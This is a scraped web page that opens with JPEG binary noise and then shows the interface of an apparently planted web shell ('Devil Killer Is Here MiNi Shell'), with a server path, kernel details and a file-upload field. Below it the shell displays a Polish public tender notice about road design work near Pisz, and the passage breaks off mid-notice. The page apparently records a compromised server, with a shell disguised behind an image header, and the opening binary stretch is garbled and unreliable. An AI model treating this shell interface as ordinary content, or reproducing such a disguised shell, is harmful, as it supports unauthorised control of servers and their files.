JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210615/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210615/0008280001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00082800 z dnia 2021-06-15</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> ˜Opracowanie dokumentacji projektowej z podziałem na 7 części dróg powiatowych i przygotowanie odpowiednich wniosków - w zależności od części/zadania zezwalających na realizację robót budowlanych. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">˜POWIATOWY ZARZĄD DRÓG W PISZU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">˜REGON 790676010</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">˜ul. Fryderyka Adama Czerniewskiego 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">˜Pisz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">˜12-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL623 - Ełcki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">˜874232807</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">˜87 423 24 22</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">˜parkwaypzd@hot.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">˜www.pzd.pisz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ˜Opracowanie dokumentacji projektowej z podziałem na 7 części dróg powiatowych i przygotowanie odpowiednich wniosków - w zależności od części/zadania zezwalających na realizację robót budowlanych. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">˜ocds-148610-9dbfbfd1-cda1-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00082800</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">˜2021/BZP 00004230/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Wyrównanie masą mineralno- asfaltową nawierzchni dwóch skrzyżowań drogi powiatowej Nr 1702N od km 5+980 do km 6+155 wraz z przełożeniem chodnika w m. Czarne</p> <p class="mb-0">1.3.1 Opracowanie dokumentacji projektowej na budowę chodnika w ciągu drogi powiatowej Nr 1867N w m. Drygały od km 13+838 do km 14+137</p> <p class="mb-0">1.3.2 Opracowanie dokumentacji projektowej na przebudowę drogi powiatowej Nr 4681N – ul. Słonecznej w Białej Piskiej od km 0+264 do km 0+375</p> <p class="mb-0">1.3.3 Opracowanie dokumentacji projektowej na przebudowę chodników w ciągu drogi powiatowej Nr 1646N ul. Guzianka w Rucianem-Nidzie</p> <p class="mb-0">1.3.4 Opracowanie dokumentacji projektowej na budowę chodnika w ciągu drogi powiatowej Nr 1518N od km 3+245 do km 3+445 w m. Karwica</p> <p class="mb-0">1.3.5 Opracowanie dokumentacji projektowej na przebudowę drogi powiatowej Nr 1684N od km 3+535 do km 4+255 w m. Włosty</p> <p class="mb-0">1.3.6 Opracowanie dokumentacji projektowej na przebudowę drogi powiatowej Nr 1686N od km 0+300 do km 2+757 w m. Karwik</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> ˜http://bip.powiat.pisz.pl/index.php?k=145 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">˜https://pzdpisz.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">˜Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych.elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciuformularzy, o których mowa w ust. 2, opisane zostały w Regulaminie korzystania z MarketplanetOnePlace.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">˜Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:1)	administratorem Pani/Pana danych osobowych jest Powiatowy Zarząd Dróg w Piszu /ul. Czerniewskiego 6, 12-200 Pisz, tel. 87 423 28 07, e-mail: parkwaypzd@hot.pl/;2)	w sprawach z zakresu ochrony danych osobowych mogą Państwo kontaktować się z Inspektorem Ochrony Danych - Pan Waldemar Chypś pod adresem e-mail: inspektor@cbi24.pl;3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym;4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp;5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;8)	posiada Pani/Pan:a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;9)	nie przysługuje Pani/Panu:a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;10)	przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">˜PZD.3210.5.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ˜Zadania Nr 1: Opracowanie dokumentacji projektowej na budowę chodnika w ciągu drogi powiatowej Nr 1867N w m. Drygały od km 13+838 do km 14+137 wraz z przygotowaniem wniosku o wydanie decyzji zezwalającej na realizację inwestycji drogowej;Stan istniejącyDroga powiatowa Nr 1867N DK Nr 16 (Wierzbiny) – Drygały – DP Nr 1680N (Skarżyn) na odcinku od km 13+838 do km 14+137 – ul. Kościuszki w m. Drygały posiada nawierzchnię bitumiczną o szerokości ok. 6 m, stan nawierzchni – dobry, stan poboczy – zadowalający. Lewa krawędź jezdni (od strony projektowanego chodnika zakończona krawężnikiem drogowym.Stan projektowany- Początek opracowania – km 13+838 – strona lewa,- Koniec opracowania – km 14+137 – strona lewa,- Kategoria drogi – powiatowa,- Klasa drogi – Z,- Kategoria ruchu – KR 2,- Szerokość chodnika – 2,00 m,- Nawierzchnia chodnika – kostka betonowa grubości 8 cm,- Nawierzchnia istniejących zjazdów – kostka betonowa grubości 8 cm, - W przypadku stwierdzenia na projektowanym odcinku budowy chodnika kolizji z istniejącą infrastrukturą techniczną należy zaprojektować przebudowę obiektów oraz urządzeń obcych infrastruktury technicznej znajdujących się w liniach rozgraniczających teren inwestycji.Kilometraż podany przez Zamawiającego należy traktować jako orientacyjny. Szczegółowe pomiary w trakcie opracowywania dokumentacji przez projektanta mają wskazać kilometraż rzeczywisty, który będzie miał odbicie w opracowanej dokumentacji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">˜3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">˜Oferty ocenianie będą punktowo dla każdego kryterium oddzielnie. O wyborze najkorzystniejszej oferty zdecyduje największa liczba zdobytych punktów łącznie we wszystkich kryteriach. Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc Po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">˜Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">˜Doświadczenie Projektanta branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> ˜Oferty ocenianie będą punktowo dla każdego kryterium oddzielnie. O wyborze najkorzystniejszej oferty zdecyduje największa liczba zdobytych punktów łącznie we wszystkich kryteriach. Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc Po przecinku, zgodnie z zasadami arytmetyki. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ˜Zadanie Nr 2: Opracowanie dokumentacji projektowej na przebudowę drogi powiatowej Nr 4681N – ul. Słonecznej w Białej Piskiej od km 0+264 do km 0+375 wraz z przygotowaniem zgłoszenia robót budowlanych niewymagających pozwolenia na budowę;Stan istniejącyDroga powiatowa Nr 4681N – ul. Słoneczna w Białej Piskiej na odcinku od km 0+264 do km 0+375 posiada nawierzchnię gruntowo – żwirową, stan nawierzchni – zadowalający. Szerokość pasa drogowego wynosi 8,00 m.Stan projektowany- Początek opracowania – km 0+264,- Koniec opracowania – km 0+375,- Kategoria drogi – powiatowa,- Klasa drogi – L,- Kategoria ruchu – KR 2,- Szerokość jezdni – 5,50 m,- Nawierzchnia jezdni – beton asfaltowy,- Jednostronny chodnik o szerokości – 1,50 m – strona lewa,- Szerokość pobocza – 0,75 m – strona prawa,- Nawierzchnia chodnika – kostka betonowa grubości 8 cm,- Zjazdy do istniejących posesji o nawierzchni – kostka betonowa grubości 8 cm,- Odwodnienie do istniejących wpustów ulicznych, - W przypadku stwierdzenia na projektowanym odcinku budowy chodnika kolizji z istniejącą infrastrukturą techniczną należy zaprojektować przebudowę obiektów oraz urządzeń obcych infrastruktury technicznej znajdujących się w liniach rozgraniczających teren inwestycji.Kilometraż podany przez Zamawiającego należy traktować jako orientacyjny. Szczegółowe pomiary w trakcie opracowywania dokumentacji przez projektanta mają wskazać kilometraż rzeczywisty, który będzie miał odbicie w opracowanej dokumentacji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">˜5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">˜Oferty ocenianie będą punktowo dla każdego kryterium oddzielnie. O wyborze najkorzystniejszej oferty zdecyduje największa liczba zdobytych punktów łącznie we wszystkich kryteriach. Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc Po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">˜Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">˜Doświadczenie Projektanta branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> ˜Oferty ocenianie będą punktowo dla każdego kryterium oddzielnie. O wyborze najkorzystniejszej oferty zdecyduje największa liczba zdobytych punktów łącznie we wszystkich kryteriach. Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc Po przecinku, zgodnie z zasadami arytmetyki. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ˜Zadanie Nr 3: Opracowanie dokumentacji projektowej na przebudowę chodników w ciągu drogi powiatowej Nr 1646N – ul. Guzianka w Rucianem-Nidzie od km 1+072 do km 1+499 strona lewa i od km 1+539 do km 1+621 strona prawa wraz z przygotowaniem zgłoszenia robót budowlanych niewymagających pozwolenia na budowę;Stan istniejącyDroga powiatowa Nr 1646N DK Nr 58 (Ruciane Nida) – Wejsuny – Głodowo na odcinku od km 1+072 do km 1+621 – ul. Guzianka w Rucianem-Nidzie posiada nawierzchnię bitumiczną o szerokości ok. 6 m, stan nawierzchni i chodników – dobry. Lewa krawędź jezdni (od strony projektowanego chodnika zakończona krawężnikiem drogowym.Stan projektowany- Początek opracowania – km 1+072 – strona lewa,- Koniec opracowania – km 1+499 – strona lewa,- Początek opracowania – km 539 – strona prawa,- Koniec opracowania – km 1+621 – strona prawa,- Kategoria drogi – powiatowa,- Klasa drogi – Z,- Kategoria ruchu – KR 2,- Szerokość chodnika – 2,00 m,- Nawierzchnia chodnika – kostka betonowa grubości 8 cm,- Nawierzchnia istniejących zjazdów – kostka betonowa grubości 8 cm, - W przypadku stwierdzenia na projektowanym odcinku budowy chodnika kolizji z istniejącą infrastrukturą techniczną należy zaprojektować przebudowę obiektów oraz urządzeń obcych infrastruktury technicznej znajdujących się w liniach rozgraniczających teren inwestycji.Kilometraż podany przez Zamawiającego należy traktować jako orientacyjny. Szczegółowe pomiary w trakcie opracowywania dokumentacji przez projektanta mają wskazać kilometraż rzeczywisty, który będzie miał odbicie w opracowanej dokumentacji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">˜5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">˜Oferty ocenianie będą punktowo dla każdego kryterium oddzielnie. O wyborze najkorzystniejszej oferty zdecyduje największa liczba zdobytych punktów łącznie we wszystkich kryteriach. Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc Po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa 